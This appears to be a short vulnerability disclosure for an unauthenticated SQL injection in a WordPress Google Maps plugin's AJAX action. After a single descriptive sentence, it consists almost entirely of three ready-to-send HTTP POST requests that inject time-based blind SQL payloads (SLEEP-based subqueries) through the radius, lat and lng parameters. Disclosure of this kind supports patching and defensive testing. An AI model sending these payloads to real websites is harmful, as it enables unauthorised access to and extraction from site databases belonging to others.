The plugin does not properly sanitise and escape some parameters before using them in an SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection
Note: /2022/12/29/map/ is page/post where the Google_Maps_WD is embed
POST /2022/12/29/map/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
radius=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)&lat=0.0&lng=0.0&distance_in=km
POST /2022/12/29/map/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 171
radius=1&lat=0.0))))+AS+distance+FROM+wp_gmwd_markers+as+T_MARKERS+where+T_MARKERS.published=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)--+)&lng=0.0&distance_in=km
POST /2022/12/29/map/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 171
radius=1&lat=0.0&lng=0.0))))+AS+distance+FROM+wp_gmwd_markers+as+T_MARKERS+where+T_MARKERS.published=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)--+)&distance_in=km